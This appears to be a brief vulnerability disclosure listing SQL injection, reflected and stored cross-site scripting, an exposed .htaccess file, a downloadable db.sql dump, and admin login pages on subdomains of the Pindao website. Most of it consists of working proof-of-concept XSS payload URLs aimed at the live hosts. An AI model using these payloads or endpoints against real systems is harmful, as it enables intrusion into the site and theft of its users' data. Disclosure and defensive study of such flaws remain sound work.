Multiple vulnerabilities in Pindao (品导网)
1. High-risk SQL Injection (root)
http://pai.pindao.com/match/api/share/?id=537
2. Cross Site Scripting
http://tuan.pindao.com/subscribe.php
POST
email="><script>alert(/xss/)</script>
3. Multiple Cross Site Scripting (PHP_SELF)
http://go.pindao.com/search_1_0_0_%22%3E%3Cscript%3Ealert%28%2Fxss%2F%29%3C%2Fscript%3E
http://trust.pindao.com/trust/index/detail/trustid/1/%22%3E%3Cscript%3Ealert%28/xss/%29%3C/script%3E
http://pai.pindao.com/hercloset/358232/2154/1/0/0/%22%3E%3Cscript%3Ealert%28/xss/%29%3C/script%3E
4. Cross Site Scripting (onmouseover)
http://www.pindao.com/cms/motor/artselect/keyword/%22%20onmouseover=alert%28123456%29%20bad=%22/t/1/page/1/timeera/0
5. Stored Cross Site Scripting
After login, multiple parameters in the member basic information section are not filtered.
http://trust.pindao.com/.htaccess
7. SQL Leakage
http://tuan.pindao.com/db.sql
Leakage
http://tuan.pindao.com/manage/login.php
http://help.pindao.com/user/account/login
http://i.pindao.com/user/account/login